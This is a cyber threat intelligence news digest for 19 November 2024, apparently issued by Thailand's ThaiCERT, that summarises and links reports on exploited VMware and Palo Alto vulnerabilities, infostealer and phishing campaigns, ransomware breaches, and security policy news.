Cyber Threat Intelligence 19 November 2024

NCSA_THAICERT

Industrial Sector

Many US Water Systems Exposed To ‘high-Risk’ Vulnerabilities, Watchdog Finds
"Nearly 100 drinking water systems across the U.S. have “high-risk” vulnerabilities in the technology they use to serve millions of residents, according to a new report from a federal watchdog. The Environmental Protection Agency’s Office of Inspector General conducted a review of the agency’s cybersecurity initiatives, using an algorithm to rank issues at specific water utilities across the U.S. revolving around email security, IT hygiene, vulnerabilities, adversarial threats, and malicious activity."
https://therecord.media/us-water-systems-exposed-vulnerabilities
https://www.epaoig.gov/reports/other/management-implication-report-cybersecurity-concerns-related-drinking-water-systems
https://www.securityweek.com/300-drinking-water-systems-in-us-exposed-to-disruptive-damaging-hacker-attacks/
https://hackread.com/cybersecurity-flaws-us-drinking-water-systems-risks/

New Tooling

ScubaGear: Open-Source Tool To Assess Microsoft 365 Configurations For Security Gaps
"ScubaGear is an open-source tool the Cybersecurity and Infrastructure Security Agency (CISA) created to automatically evaluate Microsoft 365 (M365) configurations for potential security gaps. ScubaGear analyzes an organization’s M365 tenant configuration, offering actionable insights and recommendations to help administrators address security gaps and strengthen defenses within their Microsoft 365 environment."
https://www.helpnetsecurity.com/2024/11/18/scubagear-open-source-tool-assess-microsoft-365-security/
https://github.com/cisagov/ScubaGear

Vulnerabilities

Critical RCE Bug In VMware vCenter Server Now Exploited In Attacks
"Broadcom warned today that attackers are now exploiting two VMware vCenter Server vulnerabilities, one of which is a critical remote code execution flaw. TZL security researchers reported the RCE vulnerability (CVE-2024-38812) during China's 2024 Matrix Cup hacking contest. It is caused by a heap overflow weakness in the vCenter's DCE/RPC protocol implementation and affects products containing vCenter, including VMware vSphere and VMware Cloud Foundation."
https://www.bleepingcomputer.com/news/security/critical-rce-bug-in-vmware-vcenter-server-now-exploited-in-attacks/
https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/
https://securityaffairs.com/171147/security/vmware-vcenter-server-bugs-actively-exploited.html
https://www.theregister.com/2024/11/18/vmware_vcenter_rce_exploited/
Palo Alto Networks Patches Two Firewall Zero-Days Used In Attacks
"Palo Alto Networks has finally released security updates for two actively exploited zero-day vulnerabilities in its Next-Generation Firewalls (NGFW). The first flaw, tracked as CVE-2024-0012, is an authentication bypass found in the PAN-OS management web interface that remote attackers can exploit to gain administrator privileges without requiring authentication or user interaction. The second one (CVE-2024-9474) is a PAN-OS privilege escalation security flaw that allows malicious PAN-OS administrators to perform actions on the firewall with root privileges."
https://www.bleepingcomputer.com/news/security/palo-alto-networks-patches-two-firewall-zero-days-used-in-attacks/
https://www.darkreading.com/cyberattacks-data-breaches/palo-alto-networks-patches-critical-zero-day-bug-firewalls
https://www.securityweek.com/palo-alto-networks-releases-iocs-for-new-firewall-zero-day/
https://www.helpnetsecurity.com/2024/11/18/cve-2024-0012-cve-2024-9474/
CISA Adds Three Known Exploited Vulnerabilities To Catalog
"CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
CVE-2024-1212 Progress Kemp LoadMaster OS Command Injection Vulnerability
CVE-2024-0012 Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
CVE-2024-9474 Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability"
https://www.cisa.gov/news-events/alerts/2024/11/18/cisa-adds-three-known-exploited-vulnerabilities-catalog

Malware

Distribution Of LummaC2 Infostealer Based On Legitimate Programs
"LummaC2 is an Infostealer actively being distributed while being disguised as illegal software such as cracks, and its distribution and creation methods are changing continuously. It has recently been distributed by being inserted into legitimate programs, so caution is needed."
https://asec.ahnlab.com/en/84556/
Inside Water Barghest’s Rapid Exploit-To-Market Strategy For IoT Devices
"There is a big incentive for both espionage motivated actors and financially motivated actors to set up proxy botnets. These can serve as an anonymization layer, which can provide plausibly geolocated IP addresses to scrape contents of websites, access stolen or compromised online assets, and launch cyber-attacks. Examples of proxy botnets set up by advanced persistent threat (APT) actors are the VPNFilter botnet and Cyclops Blink, both deployed by Sandworm and disrupted by the Federal Bureau of Investigation (FBI) in 2018 and 2022, respectively."
https://www.trendmicro.com/en_us/research/24/k/water-barghest.html
https://www.bankinfosecurity.com/suspected-russian-hackers-infect-20000-iot-devices-a-26840
Inside Bitdefender Labs’ Investigation Of a Malicious Facebook Ad Campaign Targeting Bitwarden Users
"Throughout 2024, Bitdefender Labs has been closely monitoring a series of malvertising campaigns that exploit popular platforms to spread malware. These campaigns use fake advertisements to lure users into installing malicious software disguised as legitimate apps or updates. One of the more recent campaigns Bitdefender Labs uncovered involves a fake Bitwarden extension advertised on Meta’s social media platform Facebook. The campaign tricks users into installing a harmful browser extension under the guise of a security update."
https://www.bitdefender.com/en-us/blog/labs/inside-bitdefender-labs-investigation-of-a-malicious-facebook-ad-campaign-targeting-bitwarden-users
https://www.bleepingcomputer.com/news/security/fake-bitwarden-ads-on-facebook-push-info-stealing-chrome-extension/
https://hackread.com/facebook-malvertising-malware-via-fake-bitwarden/
Microsoft 365 Admin Portal Abused To Send Sextortion Emails
"The Microsoft 365 Admin Portal is being abused to send sextortion emails, making the messages appear trustworthy and bypassing email security platforms. Sextortion emails are scams claiming that your computer or mobile device was hacked to steal images or videos of you performing sexual acts. The scammers then demand from you a payment of $500 to $5,000 to prevent them from sharing the compromising photos with your family and friends."
https://www.bleepingcomputer.com/news/security/microsoft-365-admin-portal-abused-to-send-sextortion-emails/
Akira Ransomware Racks Up 30+ Victims In a Single Day
"Akira ransomware group has updated its data-leak website on Nov. 13-14, listing more than 30 of its latest victims — the highest single-day total since the gang first began its malicious operations in March of last year. The group spares no one, targeting a variety of industries globally, and operates using a ransomware-as-a-service (RaaS) model, stealing sensitive data before encrypting it."
https://www.darkreading.com/cyberattacks-data-breaches/akira-ransomware-30-victims-single-day
https://therecord.media/akira-ransomware-group-publishes-unprecedented-leak-data
https://drive.google.com/file/d/11ZjlJg2LDHAOwxFjUsqaZrK7Yg15IrAw/view
Government Agency Spoofing: DocuSign Attacks Exploit Government-Vendor Trust
"The latest wave of DocuSign attacks has taken a concerning turn, specifically targeting businesses that regularly interact with state, municipal, and licensing authorities. Since November 8 through November 14, we have observed a 98% increase in the use of DocuSign phishing URLs compared to all of September and October. In the last few days, our threat researchers are seeing hundreds of instances each day, many of which involve government impersonations. What’s more, the specific tactics employed in these attacks are evolving on a daily basis. Contact us for more information about DocuSign attack metrics."
https://slashnext.com/blog/government-docusign-impersonation-attacks/
https://hackread.com/us-govt-agencies-impersonate-docusign-phishing-scams/
Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape
"Proofpoint researchers have identified an increase in a unique social engineering technique called ClickFix. And the lures are getting even more clever. Initially observed earlier this year in campaigns from initial access broker TA571 and a fake update website compromise threat cluster known as ClearFake, the ClickFix technique that attempts to lure unsuspecting users to copy and run PowerShell to download malware is now much more popular across the threat landscape. The ClickFix social engineering technique uses dialogue boxes containing fake error messages to trick people into copying, pasting, and running malicious content on their own computer."
https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
https://www.infosecurity-magazine.com/news/clickfix-cyber-malware-rise/
QuickBooks Popup Scam Still Being Delivered Via Google Ads
"Accounting software QuickBooks, by Intuit, is a popular target for India-based scammers, only rivaled for top spot by the classic Microsoft tech support scams. We’ve seen two main lures, both via Google ads: the first one is simply a website promoting online support for QuickBooks and shows a phone number, while the latter requires victims to download and install a program that will generate a popup, also showing a phone number. In both instances, that number is fraudulent."
https://www.malwarebytes.com/blog/scams/2024/11/quickbooks-popup-scam-still-being-delivered-via-google-ads
Threat Brief: Operation Lunar Peek, Activity Related To CVE-2024-0012
"Palo Alto Networks and Unit 42 are engaged in tracking a limited set of exploitation activity related to CVE-2024-0012 and are working with external researchers, partners, and customers to share information transparently and rapidly."
https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
Exploit Attempts For Unpatched Citrix Vulnerability
"Last week, Watchtowr Labs released details describing a new and so far unpatched vulnerability in Citrix's remote access solution [1]. Specifically, the vulnerability affects the "Virtual Apps and Desktops." This solution allows "secure" remote access to desktop applications. It is commonly used for remote work, and I have seen it used in call center setups to isolate individual workstations from the actual desktop."
https://isc.sans.edu/diary/31446
XLoader Executed Through JAR Signing Tool (jarsigner.exe)
"Recently, AhnLab SEcurity intelligence Center (ASEC) identified the distribution of XLoader malware using the DLL side-loading technique. The DLL side-loading attack technique saves a normal application and a malicious DLL in the same folder path to enable the malicious DLL to also be executed when the application is run. The legitimate application used in the attack, jarsigner, is a file created during the installation of the IDE package distributed by the Eclipse Foundation. It is a tool for signing JAR (Java Archive) files."
https://asec.ahnlab.com/en/84574/

Breaches/Hacks/Leaks

Library Of Congress Says An Adversary Hacked Some Emails
"The Library of Congress has notified lawmakers of a “cyber breach” of its IT system by an adversary, a hack of emails between some congressional offices and library staff, according to an email obtained by The Associated Press. The library said that an adversary accessed email communications during the period from January to September. The matter has been referred to law enforcement, the library said. Authorities gave no immediate information on the attacker, including whether their identity was known."
https://www.securityweek.com/library-of-congress-says-an-adversary-hacked-some-emails/
https://securityaffairs.com/171138/data-breach/library-of-congress-email-communications-hacked.html
US Space Tech Giant Maxar Discloses Employee Data Breach
"Hackers breached U.S. satellite maker Maxar Space Systems and accessed personal data belonging to its employees, the company informs in a notification to impacted individuals. The threat actor compromised the company network about a week before the discovery of the intrusion. Immediately after discovering the unauthorized access, the company took action to prevent the hackers from reaching further into the system."
https://www.bleepingcomputer.com/news/security/us-space-tech-giant-maxar-discloses-employee-data-breach/
Ransomware Attack On Oklahoma Medical Center Impacts 133,000
"Great Plains Regional Medical Center in Oklahoma is notifying over 133,000 individuals that their personal information was compromised in a ransomware attack. The public, not-for-profit healthcare system discovered the attack on September 8, 2024, when ransomware was deployed, but the attackers had access to its systems for at least three days prior. According to the medical center, the attackers accessed and encrypted certain files between September 5 and September 8, and exfiltrated information from its systems."
https://www.securityweek.com/ransomware-attack-on-oklahoma-medical-center-impacts-133000/
Ford 'actively Investigating' After Employee Data Allegedly Parked On Leak Site
"Ford Motor Company says it is looking into allegations of a data breach after attackers claimed to have stolen an internal database containing 44,000 customer records and dumped the info on a cyber crime souk for anyone to "enjoy." "Ford is aware and is actively investigating the allegations that there has been a breach of Ford data," spokesperson Richard Binhammer told The Register. "Our investigation is active and ongoing." The erstwhile manufacturer of the Edsel declined to answer our questions about the possible compromise."
https://www.theregister.com/2024/11/18/ford_actively_investigating_breach/

General News

Identity Fraud And The Cost Of Living Crisis: New Challenges For 2024
"Fraud is a rampant threat to individuals and organizations worldwide and across all sectors. In order to protect against the dangers of fraud in its many forms, it is vital to stay in the loop on the latest fraud trends and the threat landscape. The Fraudscape 2024 report from Cifas, the UK’s Fraud Prevention Community, is an effort to share this information to help prevent fraud. The report is compiled using data from Cifas’ National Fraud Database (NFD), Insider Threat Database (ITD), and intelligence from members, partners, and law enforcement agencies."
https://www.tripwire.com/state-of-security/identity-fraud-and-cost-living-crisis-new-challenges
Cyberbiosecurity: Where Digital Threats Meet Biological Systems
"Cyberbiosecurity has emerged as an essential area of interest as the boundaries between the digital and biological sectors continue to blur. With rapid advancements in areas such as artificial intelligence, automation, and synthetic biology, the need for strong cyberbiosecurity protections has grown to safeguard the bioeconomy. As biotechnology evolves, it creates a complex landscape where breaches can have consequences far beyond typical cyber risks. Cyberbiosecurity is about securing the foundation of our biological future."
https://www.tripwire.com/state-of-security/cyberbiosecurity-where-digital-threats-meet-biological-systems
Navigating The Compliance Labyrinth: A CSO’s Guide To Scaling Security
"Imagine navigating a labyrinth where the walls constantly shift, and the path ahead is obscured by fog. If this brings up a visceral image, you’ve either seen David Bowie’s iconic film or are very familiar with the real-world challenge of compliance in today’s fast-paced business environment."
https://www.helpnetsecurity.com/2024/11/18/cso-compliance-challenges/
Transforming Code Scanning And Threat Detection With GenAI
"In this Help Net Security interview, Stuart McClure, CEO of Qwiet AI, discusses the evolution of code scanning practices, highlighting the shift from reactive fixes to proactive risk management. McClure also shares his perspective on the future of AI-driven code scanning, emphasizing the potential of machine learning in threat detection and remediation."
https://www.helpnetsecurity.com/2024/11/18/stuart-mcclure-qwiet-ai-code-scanning/
UK Shoppers Lost £11.5m Last Christmas, NCSC Warns
"One of the UK’s leading cybersecurity agencies is urging the nation’s shoppers to stay safe online, after revealing that they lost over £11.5m ($14.5m) to fraudsters during last year’s festive period. Over recent years, the countdown to the busy Christmas shopping season has begun at around Black Friday, which falls this year on November 29, and lasts until early January. Yet new figures revealed today by the NCSC and Action Fraud note that scammers took an average of £695 from each of their online victims between November 2023 and January 2024."
https://www.infosecurity-magazine.com/news/ncsc-warns-uk-shoppers-lost-115m/
US Charges Phobos Ransomware Admin After South Korea Extradition
"Evgenii Ptitsyn, a Russian national and suspected administrator of the Phobos ransomware operation, was extradited from South Korea and is facing cybercrime charges in the United States. Phobos is a long-running ransomware-as-a-service (RaaS) operation (derived from the Crysis ransomware family) widely distributed through many affiliates. Between May 2024 and November 2024, it accounted for roughly 11% of all submissions to the ID Ransomware service."
https://www.bleepingcomputer.com/news/security/us-charges-phobos-ransomware-admin-after-south-korea-extradition/
https://therecord.media/russian-national-in-custody-extradited
https://www.bankinfosecurity.com/accused-phobos-ransomware-hacker-in-us-custody-a-26839
https://cyberscoop.com/alleged-russian-phobos-ransomware-administrator-extradited-to-u-s-in-custody/
Why The Demand For Cybersecurity Innovation Is Surging
"Companies have never faced a wider and more dynamic array of cyber threats than they do right now. From rapidly rising costs associated with data breaches and other cyberattacks to the exploitation of artificial intelligence (AI) to make attacks more effective than ever, the cyber-threat landscape is constantly evolving. This has led to a drastic increase in cybersecurity spending, as well as a wave of innovation in the sector."
https://www.darkreading.com/cyberattacks-data-breaches/why-demand-cybersecurity-innovation-is-surging
Why Custom IOCs Are Necessary For Advanced Threat Hunting And Detection
"The speed, precision, timeliness, and relevance of Cyber Threat Intelligence (CTI) is crucial for protecting digital infrastructures and driving proactive responses against emerging cybersecurity threats. To me, CTI is an ART: it has to be Actionable, Reliable, and Timely. One of the most critical components of CTI is indicators of compromise (IOCs). IOCs are crumbs of data or fingerprints (e.g., unusual IP addresses and web domains, unexpected network traffic, suspicious changes in file systems) left by adversaries in a previous cyberattack. This serves as invaluable clues to security professionals for detecting and tracing potential breaches or malicious activities in their own environments. Despite the on-paper benefits of IOCs, most cybersecurity professionals struggle to utilize them effectively."
https://www.securityweek.com/why-custom-iocs-are-necessary-for-advanced-threat-hunting-and-detection/
DHS Releases Secure AI Framework For Critical Infrastructure
"The US Department of Homeland Security (DHS) has released recommendations that outline how to securely develop and deploy artificial intelligence (AI) in critical infrastructure. The recommendations apply to all players in the AI supply chain, starting with cloud and compute infrastructure providers, to AI developers, and all the way to critical infrastructure owners and operators. Recommendations for civil society and public-sector organizations are also provided. The voluntary recommendations in "Roles and Responsibilities Framework for Artificial Intelligence in Critical Infrastructure" look at each of the roles across five key areas: securing environments, driving responsible model and system design, implementing data governance, ensuring safe and secure deployment, and monitoring performance and impact. There are also technical and process recommendations to enhance the safety, security, and trustworthiness of AI systems."
https://www.darkreading.com/cloud-security/dhs-releases-secure-ai-framework-critical-infrastructure

อ้างอิง
Electronic Transactions Development Agency(ETDA)